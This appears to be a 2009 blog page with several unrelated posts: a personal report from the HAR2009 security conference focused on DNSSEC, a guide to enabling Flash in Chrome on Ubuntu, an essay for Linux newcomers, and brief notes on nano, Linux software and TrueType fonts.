(the tent to the right was the one I slept in)

HAR (Hacking At Random) is an international technology and security conference, with a strong free software, freedom of information political leaning. I had not heard of it until I reached Berlin, but was told so much good about it from so many different people, that I was convinced to go. I was lucky to get some last minute tickets, from some friends of a friend from the Viennese Metalab who could not make it. The 2000 tickets had all been sold out a month ago. Needless to say I had largely missed the deadlines for submitting a presentation. The organisers though were interested enough in what I was presenting on Distributed Social Networks that they gave me a couple of 2 hour workshop sessions to present. The first one of them was filmed, but I am not sure where the video is yet. (I'll update this when I get a link to it.) On Saturday I was lucky to get a 10 minute slot on the Lightening Talks track. This was recorded:

(( Mhh, one learns a lot from being filmed. I was not so aware how much I gesticulate with my hands. Something I picked up in France I think, but without the french mastery...))

Given how foaf+ssl builds up on X509 and relies on existing Internet infrastructure this conference was an excellent place to come to and learn the latest on holes and limitations in these technologies. Perhaps the most relevant talk was the one given by Dan Kaminsky x509 considered harmful, which he gave while downing a bottle of excellent whiskey - as I found out while talking to him after the presentation.

In his talk Dan really beats home the importance of DNSSEC, the next version of DNS which is about to get a lot higher profile as the root DNS server moves over to it at the end of this year. The x509 problems could mostly disappear with the rollout of DNSSEC, which is good for me, because it means we can continue working on foaf+ssl.

If there was a main theme I got from this conference, then it was clearly the importance of the deployment of DNSSEC. It may be a lot more heavy weight, and a lot more complex than what we have currently, but the problems are getting to be so big, that it is unavoidable. For a good presentation of these issues see Bert Hubert's talk, the man behind PowerDNS:

For an overview/introduction of what DNSSEC is, how it functions and what problems it solves, see Rick Van Rein's presentation Cracking Internet: the urgency of DNSSEC.

Sun Microsystems is also supporting the DNSSEC effort. In this security alert, you can read

Note 1: The above patches implement mitigation strategies within the implementation of the DNS protocol, specifically source port randomization and query ID randomization making BIND 9 more resilient to an attack. It does not, however, completely remove the possibility of exploitation of this issue.

The full resolution is for DNS Security Extensions (DNSSEC) to be implemented Internet-wide. DNS zone administrators should start signing their zones.

If your site's parent DNS zone is not signed you can register with the ISC's DNSSEC Look-aside Validation (DLV) registry at the following URL:

https://secure.isc.org/ops/dlv/

Further details on configuring your DNA zones for DNSSEC is available from the ISC at the following URL:

http://www.isc.org/sw/bind/docs/DNSSEC_in_6_minutes.pdf

The issues addressed by these talks are not just technical, they have political implications for how we live. There were many good talks on the subject here at HAR, but my favorite, perhaps because I followed the story in France so carefully, was the one given by Jéremie Zimmermann co-founder of Quadrature du Net a French site with an English translation, that does an excellent job tracking the position of French and European politicians on issues related to web freedom. Jeremie's talk on Hacking the Law was on Sunday noon, the last day of the talk, and there were some technical problems getting the projectors to work. The best way to get it for the moment is to download it from the command line

curl -o jeremie.ogv ftp://ftp.sickos.org/pub/HAR2009/room1/r1-filer.20090816-115405.ogv
And view in in your favorite ogg viewer. I think the talk starts around the 20th minute.

The talks will hopefully be placed online soon in an easier to access manner.

But HAR2009 was not just about talks. It was also about meeting people, talking, exchanging ideas. Some of the best parties were organised by the Chaos Computer Club a German wide hacker's club that deals with security and political issues, and that is widely referenced by the German media, when in need of enlightenment. They had a great tent with an excellent view of a pond, and at night had excellent DJs to create just the right ambiance to meet people. Mix that together with some Tschunk a cocktail of Club-Mate - the Germanic hacker drink - and Rum, and I found it difficult to go to sleep before 4am.

On Monday morning I cycled the remaining 100km to Amsterdam, one of the most easy going, beautiful towns in Europe, where I am writing this.

Thursday, August 20, 2009

How to Enable Flash Support in Google Chrome in Ubuntu

google chrome logoThe Chromium team has released an alpha unstable version of the Google Chrome for Linux and Mac platform. Those who are keen to try out Google Chrome in their Ubuntu machine, but are not willing to run it under wine, you can now grab the deb file and install it in your system.

One of the limitation of Google Chrome in Linux is that it does not support flash. If you intend to use it to watch your favorite YouTube channel, then you are out of luck. Luckily, there is a little trick that you can use to overcome this limitation. If you have installed the Adobe Flash player for your Firefox browser, you can now use the same player to run flash script in Google Chrome.

Installation

If you have not installed Google Chrome (unstable), go to the Chromium dev channel and grab the respective deb file for your system (32-bit and 64-bit). Double click on the deb file to start the installation. The whole process shouldn’t take more than 5 minutes.

Check for Adobe Flash player

If you have previously installed the Adobe Flash Player in your system, you should be able to find the libflashplayer.so file in the /usr/lib/flashplugin-installer directory. However, if you have installed the Flash player via the ubuntu-restricted-extra package, the libflashplayer.so will be located at the /usr/lib/adobe-flashplugin directory instead.

To find out where your libflashplayer.so is located, you might want to do a search in Nautilus.

google chrome search for libflashplayer in nautilus

google chrome libflashplayer properties

If you have not installed Flash Player, run the command in your terminal to install it:

sudo apt-get install flashplugin-installer

Installing the Flash plugin

Create a plugins folder in the Google Chrome directory

sudo mkdir /opt/google/chrome/plugins

Copy the libflashplayer.so file to the plugins folder.

sudo cp /usr/lib/flashplugin-installer/libflashplayer.so /opt/google/chrome/plugins

Note: change the source path if your libflashplayer.so file is not located at other location.

Editing the Application menu

Right click at the Application menubar and select “Edit Menus

Scroll down to find “Internet” on the left pane and select Google Chrome on the right. Click on the Properties button on the right side.

google chrome application menu

In the Command field, change the command to

/opt/google/chrome/google-chrome --enable-plugins %U

google chrome command line

Save and close all the windows.

The flash player should be working in your Google Chrome now.

google chrome playing youtube with flash support


Linux Newbie, You Have Options


Nothing gets people in the Linux World riled up like comparing distributions, desktops or editors. But for the new Linux user, the whole thing is a bit confusing. What do we tell them? Do we verbally slug it out in forums or do we offer gentle guidance to those entering the Linux jungle for the first time? It's hard not to offer an opinion in such emotional matters. One might believe that Linux, choice of desktop and editors are religious notions instead of technical ones. I offer the following gentle guidelines for the newbie who dares enter our sacred space.

Linux is many things to many people. For you, it is an alternative to Microsoft Windows and the Mac OS. For us, Linux is an operating system kernel that's used in creating Linux distributions. Distributions are a collection of programs, applications, tools and graphics to create an operating system environment comparable to what you experience with Windows or Mac.

The Window environment or GUI as some call it, comes in a variety of flavors or implementations. They all are similar to Windows and Mac but also distinctly different. Your major choices for those are GNOME, KDE, XFCE and LXDE. GNOME and KDE are great for Desktop computers but servers need less graphical interface weight than Desktops, so you probably would choose between XFCE and LXDE.

These days you have choices for almost every type of software that you've grown accustomed to on Windows or Mac. There are office suites (KOffice, OpenOffice), individual applications like Abiword and Siag, games, graphics manipulation programs (GIMP) and just about anything you can conjure up in your mind.

There's no single correct answer for every question concerning Linux or its associated applications since they all work pretty well, it comes down to a matter of choice.

Where to begin?

If you're totally new to the Linux realm, I suggest you try Ubuntu Linux. Grab the latest ISO image from ubuntu.com, burn it to an optical disk, boot your computer to it, install and never look back.
Forget all the rhetoric surrounding this distribution or that distribution--just use it, learn it and go from there.

Don't be turned off by the fanboys, fanatics and others who want to sway your mind into their respective camps--just ignore them, laugh at them and enjoy your awesome new computer.
As you learn more about Linux, you might find that Ubuntu doesn't work for you as well as another distribution--so be it. Choose another. Change monthly if you want.

Realize this: Your Linux distribution is a tool, an operating system--a righteous one but only that--an operating system. Feel free to explore this new world and enjoy it. You'll have allies and enemies no matter which camp you decide to stay in but that comes with the territory.

Welcome Linux newbie, we're glad to have you.





FONT: http://www.daniweb.com/blogs/entry4639.html#

NANO EDITOR COURSE BY http://beginlinux.com








This course is a series of courses to help you with Bash Shell Scripting. It will be divided into several sections:
Bash Shell: Basics
Bash Shell: vi Text Editor

Bash Shell: Nano Text Editor
Bash Shell: Scripting Basics
Bash Shell: Regular Expressions
Bash Shell: Text Filters

The third course will help you understand the basics of working with the nano text editor in Linux. At some time everyone who uses Linux will need a text editor. . So whatever, text editor you choose be sure you load it and use it before you need it.


COMPLETE LINUX SOFTWARE PACKAGE


Graphics:

  • The GIMP - free software replacement for Adobe Photoshop
  • F-Spot - full-featured personal photo management application for the GNOME desktop
  • Google Picasa - application for organizing and editing digital photos

Internet:

  • Firefox
  • Opera
  • Flash Player 10
  • FileZilla - multithreaded FTP client
  • Thunderbird - email and news client
  • Evolution - combines e-mail, calendar, address book, and task list management functions
  • aMule - P2P file sharing application
  • KTorrent - Bittorrent client
  • Azureus/Vuze - Java Bittorrent client
  • Kopete - multi-platform instant messaging client
  • Skype
  • Google Earth
  • Quassel IRC - IRC client

Office:

  • OpenOffice Writer - replacement for Microsoft Word
  • OpenOffice Calc - replacement for Microsoft Excel
  • Adobe Reader
  • GnuCash - double-entry book-keeping personal finance system, similar to Quicken
  • Scribus - open source desktop publishing (DTP) application

Sound & Video:

  • Amarok - audio player
  • Audacity - free, open source, cross platform digital audio editor
  • Banshee - audio player, can encode/decode various formats and synchronize music with Apple iPods
  • MPlayer - media player (video/audio), supports WMA
  • Rhythmbox Music Player - audio player, similar to Apple's iTunes, with support for iPods
  • gtkPod - software similar to Apple's iTunes, supports iPod, iPod nano, iPod shuffle, iPod photo, and iPod mini
  • XMMS - audio player similar to Winamp
  • dvd::rip - full featured DVD copy program
  • Kino - free digital video editor
  • Sound Juicer CD Extractor - CD ripping tool, supports various audio codecs
  • VLC Media Player - media player (video/audio)
  • Helix Player - media player, similar to the Real Player
  • Totem - media player (video/audio)
  • Xine - media player, supports various formats; can play DVDs
  • Brasero - CD/DVD burning program
  • K3B - CD/DVD burning program
  • Multimedia Codecs

Programming:

  • KompoZer - WYSIWYG HTML editor, similar to Macromedia Dreamweaver, but not as feature-rich (yet)
  • Bluefish - text editor, suitable for many programming and markup languages
  • Quanta Plus - web development environment, including a WYSIWYG editor

Other:

  • VirtualBox OSE - lets you run your old Windows desktop as a virtual machine under your Linux desktop, so you don't have to entirely abandon Windows
  • TrueType fonts
  • Java
  • Read-/Write support for NTFS partitions

TRUETYPE FONTS ON *NIX/LINUX BASED SYSTEMS





Add a TrueType Font

You can use the file manager to add a TrueType font. To add a TrueType font, perform the following steps:

1. Open a file manager window and select the TrueType font that you want to add.
2. From a file browser window, access the fonts:/// location. The fonts are displayed as icons.
3. Copy the TrueType font file that you want to add to the fonts:/// location.